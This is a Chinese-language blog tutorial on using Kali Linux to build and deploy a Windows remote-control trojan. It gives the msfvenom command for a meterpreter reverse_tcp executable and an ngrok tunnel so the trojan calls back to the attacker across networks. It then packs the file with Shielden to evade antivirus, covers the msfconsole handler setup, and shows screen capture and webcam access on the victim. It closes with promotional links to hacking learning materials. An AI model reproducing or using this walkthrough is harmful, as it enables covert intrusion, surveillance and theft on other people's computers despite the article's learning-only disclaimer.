当前位置:   article > 正文

使用KALI生成木马病毒实现远程控制_kali入侵电脑远程控制

kali入侵电脑远程控制

使用KALI生成木马病毒实现远程控制

前言

该文章内容仅用于学习使用Kali Linux系统,请不要将它用于非法的途径,如有意外概不负责。
   
   我将会详细介绍使用Kali Linux系统生成木马并用它远程控制一台处在外网的物理计算机,使用到的工具有:
   1、VMware Workstation Pro 16(虚拟机)
   下载地址:https://www.vmware.com/cn/products/workstation-pro/workstation-pro-evaluation.html
   2、Kali Linux 2021(系统)
   下载地址:https://www.kali.org/downloads/
   3、Sunny-Ngrok(内网穿透服务)
   登录地址:https://ngrok.cc/login.html
   4、Shielden(加壳小工具)
   下载地址:http://www.safengine.com/downloads/get-demo
   
   网络如山勤思为径,信息似海安全作舟,牢记网络安全,开始我们接下来的学习。

一、安装虚拟机和系统

安装步骤很简单,可自行百度,网络适配器选择桥接模式,要保证你的Kali Linux能连上网。
在这里插入图片描述

二、开通隧道

注册并登录Sunny-Ngrok,根据自己的情况选择开通一条隧道,我这里选的是这个免费的。
在这里插入图片描述
   隧道协议选择tcp,隧道名称自己随便起,远程端口选一个能用的顺眼的(他会给你推荐几个能用的端口),本地端口需要填写你Kali Linux系统的IP地址(用ifconfig命令可查看),冒号后面填一个你喜欢的数字(我一般都用8888),本地端口可以随时修改,确认信息无误后点击确认添加。
在这里插入图片描述
在这里插入图片描述
   打开隧道管理,点击客户端下载,将下载后的压缩文件拖进Kali Linux系统里并解压。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
   使用cd命令进入该文件夹,通过ls命令可以看到里面有个“sunny”文件。
通过./sunny clientid 隧道ID命令开启隧道。

在这里插入图片描述
在这里插入图片描述

隧道开启成功后是这样子:
在这里插入图片描述

三、生成木马

重新打开一个终端窗口,输入下列命令回车,他会在root文件夹下生成一个Windows的可执行文件muma.exe。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=服务器地址 LPORT=隧道端口 -f exe > /root/muma.exe

  • 1
  • 2

在这里插入图片描述
   这时候要注意,先把自己物理机上的所有杀毒软件退出,因为这是没有加壳的木马文件,会立即被删除,退出杀毒软件后直接将muma.exe拖进物理机即可。

四、加壳免杀

为防止被杀毒软件杀掉,就需要对它进行加壳。
   这里用到一个简单方便的加壳工具:Shielden。
在这里插入图片描述

将muma.exe拖进去,设置一些参数,如果对这个工具不熟悉的话可以百度学习一下,嫌麻烦的话就把能选的都选上,这里注意复杂度不要太高(我一般拉到66),太高可能导致该程序失效(这是我踩过的坑)。
在这里插入图片描述

下面这个就是加壳成功后的病毒文件了,因为这个加壳工具较小,不能做到专业全面的免杀,在遇到一些强力的杀毒软件的时候还是会被杀掉,所以就不要想着拿它做坏事了。经过我目前的测试,电脑管家一点都检测不出来,但会被火绒秒杀,不得不说火绒NB啊,别的杀毒软件我还没试过,就交给你们了。
在这里插入图片描述

五、远程控制

该木马程序在任何人的电脑上只要不被杀掉,都是可以进行远程控制的,这里为了更加直观,我将用我的物理机作为被控制的对象。
   
   打开终端输入msfconsole回车,这样就打开了msfconsole。
在这里插入图片描述

输入use exploit/multi/handler回车。
在这里插入图片描述

输入set payload windows/meterpreter/reverse_tcp回车。
在这里插入图片描述

输入show options回车,可以看到Lhost和Lport是空的或不匹配的,这需要我们给他手动写入。
在这里插入图片描述

输入set lhost 本地IPset lport 本地端口,这时候再用show options命令,就可以看到我们写入的信息了。
在这里插入图片描述
在这里插入图片描述

使用run命令启动并开始监听。
在这里插入图片描述

这时候我们双击物理机上的木马程序,该终端窗口就会做出反应。
在这里插入图片描述

到此,物理机的控制权就是我们的了,百度meterpreter的一些好玩的命令。
   
   一些基础的,比如查看物理机的IP地址(ipconfig):
在这里插入图片描述
   甚至是截取物理机的电脑屏幕:
在这里插入图片描述

更甚至是调用物理机的摄像头拍照等等,因为大部分命令用截图无法直观的表达给你们,所以其他好玩的命令还需要你们自己去探索,百度上有很多,我这里就不一一列出了。

结束语

因为写这篇文章时中途离开吃了个饭,换了一次网,导致IP地址改变了(细心的同学可以发现),解决办法就是把你的隧道踢下线,修改本地端口为你现在的地址,然后重新上线,重新set lhost 新的IP然后run就可以了。
   
   再提一次,该文章内容仅用于学习使用Kali Linux系统,请不要将它用于非法的途径,如有意外概不负责。
   网络并非无法之地,我这篇文章所展现的内容虽远不能对大部分有防护的电脑造成威胁,但网络安全意识是对每个计算机使用者最基本的要求。
   我们互连成网,互帮互助,共同打造良好的网络环境。
   
   我一直坚持“分享知识”的原则,强调“免费透明”,如果帮到了你,请顺手点个赞吧(#.#)。
   
今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

网络安全学习资源分享:

最后给大家分享我自己学习的一份全套的网络安全学习资料,希望对想学习 网络安全的小伙伴们有帮助!

零基础入门

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

【点击免费领取】CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》

1.学习路线图

在这里插入图片描述

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。【点击领取视频教程】

在这里插入图片描述

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本【点击领取技术文档】

在这里插入图片描述

(都打包成一块的了,不能一一展开,总共300多集)

3.技术文档和电子书

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本【点击领取书籍】

在这里插入图片描述

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

在这里插入图片描述

最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

在这里插入图片描述

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取
CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

在这里插入图片描述

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/我家小花儿/article/detail/766529
推荐阅读
相关标签
  

闽ICP备14008679号